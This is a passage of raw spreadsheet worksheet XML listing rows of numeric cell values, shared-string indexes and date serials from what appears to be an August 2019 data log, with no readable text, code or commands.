        <v>16322</v>
      </c>
      <c r="B16323">
        <v>1322</v>
      </c>
      <c r="C16323" t="s">
        <v>25497</v>
      </c>
      <c r="D16323" s="1">
        <v>43688</v>
      </c>
      <c r="E16323" t="s">
        <v>19640</v>
      </c>
      <c r="F16323" t="s">
        <v>9975</v>
      </c>
      <c r="G16323" t="s">
        <v>27232</v>
      </c>
    </row>
    <row r="16324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16324">
        <f t="shared" si="255"/>
        <v>16323</v>
      </c>
      <c r="B16324">
        <v>1323</v>
      </c>
      <c r="C16324" t="s">
        <v>25497</v>
      </c>
      <c r="D16324" s="1">
        <v>43698</v>
      </c>
      <c r="E16324" t="s">
        <v>25886</v>
      </c>
      <c r="F16324" t="s">
        <v>9975</v>
      </c>
      <c r="G16324" t="s">
        <v>27233</v>
      </c>
    </row>
    <row r="16325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16325">
        <f t="shared" si="255"/>
        <v>16324</v>
      </c>
      <c r="B16325">
        <v>1324</v>
      </c>
      <c r="C16325" t="s">
        <v>25497</v>
      </c>
      <c r="D16325" s="1">
        <v>43699</v>
      </c>
      <c r="E16325" t="s">
        <v>25517</v>
      </c>
      <c r="F16325" t="s">
        <v>9975</v>
      </c>
      <c r="G16325" t="s">
        <v>27234</v>
      </c>
    </row>
    <row r="16326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16326">
        <f t="shared" si="255"/>
        <v>16325</v>
      </c>
      <c r="B16326">
        <v>1325</v>
      </c>
      <c r="C16326" t="s">
        <v>25497</v>
      </c>
      <c r="D16326" s="1">
        <v>43685</v>
      </c>
      <c r="F16326" t="s">
        <v>9975</v>
      </c>
      <c r="G16326" t="s">
        <v>27235</v>
      </c>
    </row>
    <row r="16327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16327">
        <f t="shared" si="255"/>
        <v>16326</v>
      </c>
      <c r="B16327">
        <v>1326</v>
      </c>
      <c r="C16327" t="s">
        <v>25497</v>
      </c>
      <c r="D16327" s="1">
        <v>43683</v>
      </c>
      <c r="E16327" t="s">
        <v>27236</v>
      </c>
      <c r="F16327" t="s">
        <v>9975</v>
      </c>
      <c r="G16327" t="s">
        <v>27237</v>
      </c>
    </row>
    <row r="16328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16328">
        <f t="shared" si="255"/>
        <v>16327</v>
      </c>
      <c r="B16328">
        <v>1327</v>
      </c>
      <c r="C16328" t="s">
        <v>25497</v>
      </c>
      <c r="D16328" s="1">
        <v>43691</v>
      </c>
      <c r="E16328" t="s">
        <v>25942</v>
      </c>
      <c r="F16328" t="s">
        <v>9975</v>
      </c>
      <c r="G16328" t="s">
        <v>27238</v>
      </c>
    </row>
    <row r="16329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16329">
        <f t="shared" si="255"/>
        <v>16328</v>
      </c>
      <c r="B16329">
        <v>1328</v>
      </c>
      <c r="C16329" t="s">
        <v>25497</v>
      </c>
      <c r="D16329" s="1">
        <v>43687</v>
      </c>
      <c r="E16329" t="s">
        <v>25509</v>
      </c>
      <c r="F16329" t="s">
        <v>10021</v>
      </c>
      <c r="G16329" t="s">
        <v>27239</v>
      </c>
    </row>
    <row r="16330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16330">
        <f t="shared" si="255"/>
        <v>16329</v>
      </c>
      <c r="B16330">
        <v>1329</v>
      </c>
      <c r="C16330" t="s">
        <v>25497</v>
      </c>
      <c r="D16330" s="1">
        <v>43679</v>
      </c>
      <c r="F16330" t="s">
        <v>9978</v>
      </c>
      <c r="G16330" t="s">
        <v>27240</v>
      </c>
    </row>
    <row r="16331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16331">
        <f t="shared" si="255"/>
        <v>16330</v>
      </c>
      <c r="B16331">
        <v>1330</v>
      </c>
      <c r="C16331" t="s">
        <v>25497</v>
      </c>
      <c r="D16331" s="1">
        <v>43678</v>
      </c>
      <c r="E16331" t="s">
        <v>27241</v>
      </c>
      <c r="F16331" t="s">
        <v>10021</v>
      </c>
      <c r="G16331" t="s">
        <v>27242</v>
      </c>
    </row>
    <row r="16332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16332">
        <f t="shared" si="255"/>
        <v>16331</v>
      </c>
      <c r="B16332">
        <v>1331</v>
      </c>
      <c r="C16332" t="s">
        <v>25497</v>
      </c>
      <c r="D16332" s="1">
        <v>43685</v>
      </c>
      <c r="F16332" t="s">
        <v>9975</v>
      </c>
      <c r="G16332" t="s">
        <v>27243</v>
      </c>
    </row>
    <row r="16333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16333">
        <f t="shared" si="255"/>
        <v>16332</v>
      </c>
      <c r="B16333">
        <v>1332</v>
      </c>
      <c r="C16333" t="s">
        <v>25497</v>
      </c>
      <c r="D16333" s="1">
        <v>43700</v>
      </c>
      <c r="E16333" t="s">
        <v>25502</v>
      </c>
      <c r="F16333" t="s">
        <v>9975</v>
      </c>
      <c r="G16333" t="s">
        <v>27244</v>
      </c>
    </row>
    <row r="16334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16334">
        <f t="shared" si="255"/>
        <v>16333</v>
      </c>
      <c r="B16334">
        <v>1333</v>
      </c>
      <c r="C16334" t="s">
        <v>25497</v>
      </c>
      <c r="D16334" s="1">
        <v>43690</v>
      </c>
      <c r="E16334" t="s">
        <v>27245</v>
      </c>
      <c r="F16334" t="s">
        <v>10021</v>
      </c>
      <c r="G16334" t="s">
        <v>27246</v>
      </c>
    </row>
    <row r="16335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16335">
        <f t="shared" si="255"/>
        <v>16334</v>
      </c>
      <c r="B16335">
        <v>1334</v>
      </c>
      <c r="C16335" t="s">
        <v>25497</v>
      </c>
      <c r="D16335" s="1">
        <v>43704</v>
      </c>
      <c r="F16335" t="s">
        <v>9975</v>
      </c>
      <c r="G16335" t="s">
        <v>27247</v>
      </c>
    </row>
    <row r="16336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16336">
        <f t="shared" si="255"/>
        <v>16335</v>
      </c>
      <c r="B16336">
        <v>1335</v>
      </c>
      <c r="C16336" t="s">
        <v>25497</v>
      </c>
      <c r="D16336" s="1">
        <v>43678</v>
      </c>
      <c r="E16336" t="s">
        <v>26787</v>
      </c>
      <c r="F16336" t="s">
        <v>9975</v>
      </c>
      <c r="G16336" t="s">
        <v>27248</v>
      </c>
    </row>
    <row r="16337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16337">
        <f t="shared" si="255"/>
        <v>16336</v>
      </c>
      <c r="B16337">
        <v>1336</v>
      </c>
      <c r="C16337" t="s">
        <v>25497</v>
      </c>
      <c r="D16337" s="1">
        <v>43695</v>
      </c>
      <c r="F16337" t="s">
        <v>9975</v>
      </c>
      <c r="G16337" t="s">
        <v>27249</v>
      </c>
    </row>
    <row r="16338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16338">
        <f t="shared" si="255"/>
        <v>16337</v>
      </c>
      <c r="B16338">
        <v>1337</v>
      </c>
      <c r="C16338" t="s">
        <v>25497</v>
      </c>
      <c r="D16338" s="1">
        <v>43685</v>
      </c>
      <c r="F16338" t="s">
        <v>9975</v>
      </c>
      <c r="G16338" t="s">
        <v>27250</v>
      </c>
    </row>
    <row r="16339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16339">
        <f t="shared" si="255"/>
        <v>16338</v>
      </c>
      <c r="B16339">
        <v>1338</v>
      </c>
      <c r="C16339" t="s">
        <v>25497</v>
      </c>
      <c r="D16339" s="1">
        <v>43678</v>
      </c>
      <c r="F16339" t="s">
        <v>9975</v>
      </c>
      <c r="G16339" t="s">
        <v>25521</v>
      </c>
    </row>
    <row r="16340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16340">
        <f t="shared" si="255"/>
        <v>16339</v>
      </c>
      <c r="B16340">
        <v>1339</v>
      </c>
      <c r="C16340" t="s">
        <v>25497</v>
      </c>
      <c r="D16340" s="1">
        <v>43706</v>
      </c>
      <c r="E16340" t="s">
        <v>25502</v>
      </c>
      <c r="F16340" t="s">
        <v>9975</v>
      </c>
      <c r="G16340" t="s">
        <v>27251</v>
      </c>
    </row>
    <row r="16341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16341">
        <f t="shared" si="255"/>
        <v>16340</v>
      </c>
      <c r="B16341">
        <v>1340</v>
      </c>
      <c r="C16341" t="s">
        <v>25497</v>
      </c>
      <c r="D16341" s="1">
        <v>43705</v>
      </c>
      <c r="E16341" t="s">
        <v>25723</v>
      </c>
      <c r="F16341" t="s">
        <v>9975</v>
      </c>
      <c r="G16341" t="s">
        <v>27252</v>
      </c>
    </row>
    <row r="16342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16342">
        <f t="shared" si="255"/>
        <v>16341</v>
      </c>
      <c r="B16342">
        <v>1341</v>
      </c>
      <c r="C16342" t="s">
        <v>25497</v>
      </c>
      <c r="D16342" s="1">
        <v>43702</v>
      </c>
      <c r="E16342" t="s">
        <v>25879</v>
      </c>
      <c r="F16342" t="s">
        <v>9978</v>
      </c>
      <c r="G16342" t="s">
        <v>27253</v>
      </c>
    </row>
    <row r="16343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16343">
        <f t="shared" si="255"/>
        <v>16342</v>
      </c>
      <c r="B16343">
        <v>1342</v>
      </c>
      <c r="C16343" t="s">
        <v>25497</v>
      </c>
      <c r="D16343" s="1">
        <v>43690</v>
      </c>
      <c r="F16343" t="s">
        <v>9975</v>
      </c>
      <c r="G16343" t="s">
        <v>27254</v>
      </c>
    </row>
    <row r="16344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16344">
        <f t="shared" si="255"/>
        <v>16343</v>
      </c>
      <c r="B16344">
        <v>1343</v>
      </c>
      <c r="C16344" t="s">
        <v>25497</v>
      </c>
      <c r="D16344" s="1">
        <v>43701</v>
      </c>
      <c r="E16344" t="s">
        <v>27255</v>
      </c>
      <c r="F16344" t="s">
        <v>9975</v>
      </c>
      <c r="G16344" t="s">
        <v>27256</v>
      </c>
    </row>
    <row r="16345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16345">
        <f t="shared" si="255"/>
        <v>16344</v>
      </c>
      <c r="B16345">
        <v>1344</v>
      </c>
      <c r="C16345" t="s">
        <v>25497</v>
      </c>
      <c r="D16345" s="1">
        <v>43678</v>
      </c>
      <c r="E16345" t="s">
        <v>27257</v>
      </c>
      <c r="F16345" t="s">
        <v>9975</v>
      </c>
      <c r="G16345" t="s">
        <v>27258</v>
      </c>
    </row>
    <row r="16346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16346">
        <f t="shared" si="255"/>
        <v>16345</v>
      </c>
      <c r="B16346">
        <v>1345</v>
      </c>
      <c r="C16346" t="s">
        <v>25497</v>
      </c>
      <c r="D16346" s="1">
        <v>43699</v>
      </c>
      <c r="F16346" t="s">
        <v>9975</v>
      </c>
      <c r="G16346" t="s">
        <v>27259</v>
      </c>
    </row>
    <row r="16347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16347">
        <f t="shared" si="255"/>
        <v>16346</v>
      </c>
      <c r="B16347">
        <v>1346</v>
      </c>
      <c r="C16347" t="s">
        <v>25497</v>
      </c>
      <c r="D16347" s="1">
        <v>43706</v>
      </c>
      <c r="E16347" t="s">
        <v>25509</v>
      </c>
      <c r="F16347" t="s">
        <v>10021</v>
      </c>
      <c r="G16347" t="s">
        <v>27260</v>
      </c>
    </row>
    <row r="16348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16348">
        <f t="shared" si="255"/>
        <v>16347</v>
      </c>
      <c r="B16348">
        <v>1347</v>
      </c>
      <c r="C16348" t="s">
        <v>25497</v>
      </c>
      <c r="D16348" s="1">
        <v>43678</v>
      </c>
      <c r="E16348" t="s">
        <v>25498</v>
      </c>
      <c r="F16348" t="s">
        <v>9975</v>
      </c>
      <c r="G16348" t="s">
        <v>27261</v>
      </c>
    </row>
    <row r="16349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16349">
        <f t="shared" si="255"/>
        <v>16348</v>
      </c>
      <c r="B16349">
        <v>1348</v>
      </c>
      <c r="C16349" t="s">
        <v>25497</v>
      </c>
      <c r="D16349" s="1">
        <v>43679</v>
      </c>
      <c r="E16349" t="s">
        <v>26940</v>
      </c>
      <c r="F16349" t="s">
        <v>9975</v>
      </c>
      <c r="G16349" t="s">
        <v>27262</v>
      </c>
    </row>
    <row r="16350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16350">
        <f t="shared" si="255"/>
        <v>16349</v>
      </c>
      <c r="B16350">
        <v>1349</v>
      </c>
      <c r="C16350" t="s">
        <v>25497</v>
      </c>
      <c r="D16350" s="1">
        <v>43682</v>
      </c>
      <c r="F16350" t="s">
        <v>9975</v>
      </c>
      <c r="G16350" t="s">
        <v>27263</v>
      </c>
    </row>
    <row r="16351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16351">
        <f t="shared" si="255"/>
        <v>16350</v>
      </c>
      <c r="B16351">
        <v>1350</v>
      </c>
      <c r="C16351" t="s">
        <v>25497</v>
      </c>
      <c r="D16351" s="1">
        <v>43704</v>
      </c>
      <c r="E16351" t="s">
        <v>25750</v>
      </c>
      <c r="F16351" t="s">
        <v>9975</v>
      </c>
      <c r="G16351" t="s">
        <v>27264</v>
      </c>
    </row>
    <row r="16352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16352">
        <f t="shared" si="255"/>
        <v>16351</v>
      </c>
      <c r="B16352">
        <v>1351</v>
      </c>
      <c r="C16352" t="s">
        <v>25497</v>
      </c>
      <c r="D16352" s="1">
        <v>43700</v>
      </c>
      <c r="E16352" t="s">
        <v>27265</v>
      </c>
      <c r="F16352" t="s">
        <v>9975</v>
      </c>
      <c r="G16352" t="s">
        <v>27266</v>
      </c>
    </row>
    <row r="16353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16353">
        <f t="shared" si="255"/>
        <v>16352</v>
      </c>
      <c r="B16353">
        <v>1352</v>
      </c>
      <c r="C16353" t="s">
        <v>25497</v>
      </c>
      <c r="D16353" s="1">
        <v>43699</v>
      </c>
      <c r="E16353" t="s">
        <v>27267</v>
      </c>
      <c r="F16353" t="s">
        <v>10021</v>
      </c>
      <c r="G16353" t="s">
        <v>27268</v>
      </c>
    </row>
    <row r="16354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16354">
        <f t="shared" si="255"/>
        <v>16353</v>
      </c>
      <c r="B16354">
        <v>1353</v>
      </c>
      <c r="C16354" t="s">
        <v>25497</v>
      </c>
      <c r="D16354" s="1">
        <v>43690</v>
      </c>
      <c r="E16354" t="s">
        <v>25498</v>
      </c>
      <c r="F16354" t="s">
        <v>9975</v>
      </c>
      <c r="G16354" t="s">
        <v>27269</v>
      </c>
    </row>
    <row r="16355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16355">
        <f t="shared" si="255"/>
        <v>16354</v>
      </c>
      <c r="B16355">
        <v>1354</v>
      </c>
      <c r="C16355" t="s">
        <v>25497</v>
      </c>
      <c r="D16355" s="1">
        <v>43689</v>
      </c>
      <c r="F16355" t="s">
        <v>9975</v>
      </c>
      <c r="G16355" t="s">
        <v>27270</v>
      </c>
    </row>
    <row r="16356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16356">
        <f t="shared" si="255"/>
        <v>16355</v>
      </c>
      <c r="B16356">
        <v>1355</v>
      </c>
      <c r="C16356" t="s">
        <v>25497</v>
      </c>
      <c r="D16356" s="1">
        <v>43684</v>
      </c>
      <c r="E16356" t="s">
        <v>25512</v>
      </c>
      <c r="F16356" t="s">
        <v>9975</v>
      </c>
      <c r="G16356" t="s">
        <v>27271</v>
      </c>
    </row>
    <row r="16357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16357">
        <f t="shared" si="255"/>
        <v>16356</v>
      </c>
      <c r="B16357">
        <v>1356</v>
      </c>
      <c r="C16357" t="s">
        <v>25497</v>
      </c>
      <c r="D16357" s="1">
        <v>43679</v>
      </c>
      <c r="E16357" t="s">
        <v>25517</v>
      </c>
      <c r="F16357" t="s">
        <v>9975</v>
      </c>
      <c r="G16357" t="s">
        <v>27272</v>
      </c>
    </row>
    <row r="16358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16358">
        <f t="shared" si="255"/>
        <v>16357</v>
      </c>
      <c r="B16358">
        <v>1357</v>
      </c>
      <c r="C16358" t="s">
        <v>25497</v>
      </c>
      <c r="D16358" s="1">
        <v>43686</v>
      </c>
      <c r="F16358" t="s">
        <v>10021</v>
      </c>
      <c r="G16358" t="s">
        <v>27273</v>
      </c>
    </row>
    <row r="16359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16359">
        <f t="shared" si="255"/>
        <v>16358</v>
      </c>
      <c r="B16359">
        <v>1358</v>
      </c>
      <c r="C16359" t="s">
        <v>25497</v>
      </c>
      <c r="D16359" s="1">
        <v>43696</v>
      </c>
      <c r="F16359" t="s">
        <v>9975</v>
      </c>
      <c r="G16359" t="s">
        <v>27274</v>
      </c>
    </row>
    <row r="16360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16360">
        <f t="shared" si="255"/>
        <v>16359</v>
      </c>
      <c r="B16360">
        <v>1359</v>
      </c>
      <c r="C16360" t="s">
        <v>25497</v>
      </c>
      <c r="D16360" s="1">
        <v>43689</v>
      </c>
      <c r="E16360" t="s">
        <v>27275</v>
      </c>
      <c r="F16360" t="s">
        <v>9975</v>
      </c>
      <c r="G16360" t="s">
        <v>27276</v>
      </c>
    </row>
    <row r="16361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16361">
        <f t="shared" si="255"/>
        <v>16360</v>
      </c>
      <c r="B16361">
        <v>1360</v>
      </c>
      <c r="C16361" t="s">
        <v>25497</v>
      </c>
      <c r="D16361" s="1">
        <v>43707</v>
      </c>
      <c r="E16361" t="s">
        <v>27277</v>
      </c>
      <c r="F16361" t="s">
        <v>9978</v>
      </c>
      <c r="G16361" t="s">
        <v>27278</v>
      </c>
    </row>
    <row r="16362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16362">
        <f t="shared" si="255"/>
        <v>16361</v>
      </c>
      <c r="B16362">
        <v>1361</v>
      </c>
      <c r="C16362" t="s">
        <v>25497</v>
      </c>
      <c r="D16362" s="1">
        <v>43684</v>
      </c>
      <c r="E16362" t="s">
        <v>25509</v>
      </c>
      <c r="F16362" t="s">
        <v>10021</v>
      </c>
      <c r="G16362" t="s">
        <v>27279</v>
      </c>
    </row>
    <row r="16363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16363">
        <f t="shared" si="255"/>
        <v>16362</v>
      </c>
      <c r="B16363">
        <v>1362</v>
      </c>
      <c r="C16363" t="s">
        <v>25497</v>
      </c>
      <c r="D16363" s="1">
        <v>43688</v>
      </c>
      <c r="F16363" t="s">
        <v>10021</v>
      </c>
      <c r="G16363" t="s">
        <v>27280</v>
      </c>
    </row>
    <row r="16364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16364">
        <f t="shared" si="255"/>
        <v>16363</v>
      </c>
      <c r="B16364">
        <v>1363</v>
      </c>
      <c r="C16364" t="s">
        <v>25497</v>
      </c>
      <c r="D16364" s="1">
        <v>43690</v>
      </c>
      <c r="E16364" t="s">
        <v>26242</v>
      </c>
      <c r="F16364" t="s">
        <v>9975</v>
      </c>
      <c r="G16364" t="s">
        <v>27281</v>
      </c>
    </row>
    <row r="16365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16365">
        <f t="shared" si="255"/>
        <v>16364</v>
      </c>
      <c r="B16365">
        <v>1364</v>
      </c>
      <c r="C16365" t="s">
        <v>25497</v>
      </c>
      <c r="D16365" s="1">
        <v>43688</v>
      </c>
      <c r="F16365" t="s">
        <v>9975</v>
      </c>
      <c r="G16365" t="s">
        <v>27282</v>
      </c>
    </row>
    <row r="16366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16366">
        <f t="shared" si="255"/>
        <v>16365</v>
      </c>
      <c r="B16366">
        <v>1365</v>
      </c>
      <c r="C16366" t="s">
        <v>25497</v>
      </c>
      <c r="D16366" s="1">
        <v>43691</v>
      </c>
      <c r="E16366" t="s">
        <v>25517</v>
      </c>
      <c r="F16366" t="s">
        <v>9975</v>
      </c>
      <c r="G16366" t="s">
        <v>27283</v>
      </c>
    </row>
    <row r="16367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16367">
        <f t="shared" si="255"/>
        <v>16366</v>
      </c>
      <c r="B16367">
        <v>1366</v>
      </c>
      <c r="C16367" t="s">
        <v>25497</v>
      </c>
      <c r="D16367" s="1">
        <v>43678</v>
      </c>
      <c r="F16367" t="s">
        <v>9975</v>
      </c>
      <c r="G16367" t="s">
        <v>27284</v>
      </c>
    </row>
    <row r="16368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16368">
        <f t="shared" si="255"/>
        <v>16367</v>
      </c>
      <c r="B16368">
        <v>1367</v>
      </c>
      <c r="C16368" t="s">
        <v>25497</v>
      </c>
      <c r="D16368" s="1">
        <v>43689</v>
      </c>
      <c r="F16368" t="s">
        <v>9975</v>
      </c>
      <c r="G16368" t="s">
        <v>27285</v>
      </c>
    </row>
    <row r="16369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16369">
        <f t="shared" si="255"/>
        <v>16368</v>
      </c>
      <c r="B16369">
        <v>1368</v>
      </c>
      <c r="C16369" t="s">
        <v>25497</v>
      </c>
      <c r="D16369" s="1">
        <v>43693</v>
      </c>
      <c r="F16369" t="s">
        <v>9975</v>
      </c>
      <c r="G16369" t="s">
        <v>27286</v>
      </c>
    </row>
    <row r="16370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16370">
        <f t="shared" si="255"/>
        <v>16369</v>
      </c>
      <c r="B16370">
        <v>1369</v>
      </c>
      <c r="C16370" t="s">
        <v>25497</v>
      </c>
      <c r="D16370" s="1">
        <v>43704</v>
      </c>
      <c r="F16370" t="s">
        <v>9975</v>
      </c>
      <c r="G16370" t="s">
        <v>27287</v>
      </c>
    </row>
    <row r="16371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16371">
        <f t="shared" si="255"/>
        <v>16370</v>
      </c>
      <c r="B16371">
        <v>1370</v>
      </c>
      <c r="C16371" t="s">
        <v>25497</v>
      </c>
      <c r="D16371" s="1">
        <v>43707</v>
      </c>
      <c r="E16371" t="s">
        <v>27288</v>
      </c>
      <c r="F16371" t="s">
        <v>9975</v>
      </c>
      <c r="G16371" t="s">
        <v>27289</v>
      </c>
    </row>
    <row r="16372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16372">
        <f t="shared" si="255"/>
        <v>16371</v>
      </c>
      <c r="B16372">
        <v>1371</v>
      </c>
      <c r="C16372" t="s">
        <v>25497</v>
      </c>
      <c r="D16372" s="1">
        <v>43693</v>
      </c>
      <c r="F16372" t="s">
        <v>10021</v>
      </c>
      <c r="G16372" t="s">
        <v>27290</v>
      </c>
    </row>
    <row r="16373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16373">
        <f t="shared" si="255"/>
        <v>16372</v>
      </c>
      <c r="B16373">
        <v>1372</v>
      </c>
      <c r="C16373" t="s">
        <v>25497</v>
      </c>
      <c r="D16373" s="1">
        <v>43698</v>
      </c>
      <c r="E16373" t="s">
        <v>25592</v>
      </c>
      <c r="F16373" t="s">
        <v>9975</v>
      </c>
      <c r="G16373" t="s">
        <v>27291</v>
      </c>
    </row>
    <row r="16374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16374">
        <f t="shared" si="255"/>
        <v>16373</v>
      </c>
      <c r="B16374">
        <v>1373</v>
      </c>
      <c r="C16374" t="s">
        <v>25497</v>
      </c>
      <c r="D16374" s="1">
        <v>43696</v>
      </c>
      <c r="E16374" t="s">
        <v>23129</v>
      </c>
      <c r="F16374" t="s">
        <v>10526</v>
      </c>
      <c r="G16374" t="s">
        <v>27292</v>
      </c>
    </row>
    <row r="16375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16375">
        <f t="shared" si="255"/>
        <v>16374</v>
      </c>
      <c r="B16375">
        <v>1374</v>
      </c>
      <c r="C16375" t="s">
        <v>25497</v>
      </c>
      <c r="D16375" s="1">
        <v>43678</v>
      </c>
      <c r="E16375" t="s">
        <v>25942</v>
      </c>
      <c r="F16375" t="s">
        <v>9975</v>
      </c>
      <c r="G16375" t="s">
        <v>27293</v>
      </c>
    </row>
    <row r="16376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16376">
        <f t="shared" si="255"/>
        <v>16375</v>
      </c>
      <c r="B16376">
        <v>1375</v>
      </c>
      <c r="C16376" t="s">
        <v>25497</v>
      </c>
      <c r="D16376" s="1">
        <v>43693</v>
      </c>
      <c r="E16376" t="s">
        <v>27294</v>
      </c>
      <c r="F16376" t="s">
        <v>9975</v>
      </c>
      <c r="G16376" t="s">
        <v>27295</v>
      </c>
    </row>
    <row r="16377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16377">
        <f t="shared" si="255"/>
        <v>16376</v>
      </c>
      <c r="B16377">
        <v>1376</v>
      </c>
      <c r="C16377" t="s">
        <v>25497</v>
      </c>
      <c r="D16377" s="1">
        <v>43703</v>
      </c>
      <c r="E16377" t="s">
        <v>25512</v>
      </c>
      <c r="F16377" t="s">
        <v>9975</v>
      </c>
      <c r="G16377" t="s">
        <v>27296</v>
      </c>
    </row>
    <row r="16378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16378">
        <f t="shared" si="255"/>
        <v>16377</v>
      </c>
      <c r="B16378">
        <v>1377</v>
      </c>
      <c r="C16378" t="s">
        <v>25497</v>
      </c>
      <c r="D16378" s="1">
        <v>43682</v>
      </c>
      <c r="E16378" t="s">
        <v>25642</v>
      </c>
      <c r="F16378" t="s">
        <v>9975</v>
      </c>
      <c r="G16378" t="s">
        <v>27297</v>
      </c>
    </row>
    <row r="16379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16379">
        <f t="shared" si="255"/>
        <v>16378</v>
      </c>
      <c r="B16379">
        <v>1378</v>
      </c>
      <c r="C16379" t="s">
        <v>25497</v>
      </c>
      <c r="D16379" s="1">
        <v>43696</v>
      </c>
      <c r="E16379" t="s">
        <v>25592</v>
      </c>
      <c r="F16379" t="s">
        <v>9975</v>
      </c>
      <c r="G16379" t="s">
        <v>27298</v>
      </c>
    </row>
    <row r="16380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16380">
        <f t="shared" si="255"/>
        <v>16379</v>
      </c>
      <c r="B16380">
        <v>1379</v>
      </c>
      <c r="C16380" t="s">
        <v>25497</v>
      </c>
      <c r="D16380" s="1">
        <v>43702</v>
      </c>
      <c r="E16380" t="s">
        <v>25890</v>
      </c>
      <c r="F16380" t="s">
        <v>9975</v>
      </c>
      <c r="G16380" t="s">
        <v>27299</v>
      </c>
    </row>
    <row r="16381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16381">
        <f t="shared" si="255"/>
        <v>16380</v>
      </c>
      <c r="B16381">
        <v>1380</v>
      </c>
      <c r="C16381" t="s">
        <v>25497</v>
      </c>
      <c r="D16381" s="1">
        <v>43690</v>
      </c>
      <c r="E16381" t="s">
        <v>25517</v>
      </c>
      <c r="F16381" t="s">
        <v>9975</v>
      </c>
      <c r="G16381" t="s">
        <v>27300</v>
      </c>
    </row>
    <row r="16382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16382">
        <f t="shared" si="255"/>
        <v>16381</v>
      </c>
      <c r="B16382">
        <v>1381</v>
      </c>
      <c r="C16382" t="s">
        <v>25497</v>
      </c>
      <c r="D16382" s="1">
        <v>43681</v>
      </c>
      <c r="F16382" t="s">
        <v>10021</v>
      </c>
      <c r="G16382" t="s">
        <v>27301</v>
      </c>
    </row>
    <row r="16383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16383">
        <f t="shared" si="255"/>
        <v>16382</v>
      </c>
      <c r="B16383">
        <v>1382</v>
      </c>
      <c r="C16383" t="s">
        <v>25497</v>
      </c>
      <c r="D16383" s="1">
        <v>43693</v>
      </c>
      <c r="F16383" t="s">
        <v>9975</v>
      </c>
      <c r="G16383" t="s">
        <v>27302</v>
      </c>
    </row>
    <row r="16384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16384">
        <f t="shared" si="255"/>
        <v>16383</v>
      </c>
      <c r="B16384">
        <v>1383</v>
      </c>
      <c r="C16384" t="s">
        <v>25497</v>
      </c>
      <c r="D16384" s="1">
        <v>43678</v>
      </c>
      <c r="F16384" t="s">
        <v>10021</v>
      </c>
      <c r="G16384" t="s">
        <v>27303</v>
      </c>
    </row>
    <row r="16385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16385">
        <f t="shared" si="255"/>
        <v>16384</v>
      </c>
      <c r="B16385">
        <v>1384</v>
      </c>
      <c r="C16385" t="s">
        <v>25497</v>
      </c>
      <c r="D16385" s="1">
        <v>43684</v>
      </c>
      <c r="E16385" t="s">
        <v>27304</v>
      </c>
      <c r="F16385" t="s">
        <v>9975</v>
      </c>
      <c r="G16385" t="s">
        <v>27305</v>
      </c>
    </row>
    <row r="16386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A16386">
        <f t="shared" si="255"/>
        <v>16385</v>
      </c>
      <c r="B16386">
        <v>1385</v>
      </c>
      <c r="C16386" t="s">
        <v>25497</v>
      </c>
      <c r="D16386" s="1">
        <v>43685</v>
      </c>
      <c r="E16386" t="s">
        <v>27306</v>
      </c>
      <c r="F16386" t="s">
        <v>9975</v>
      </c>
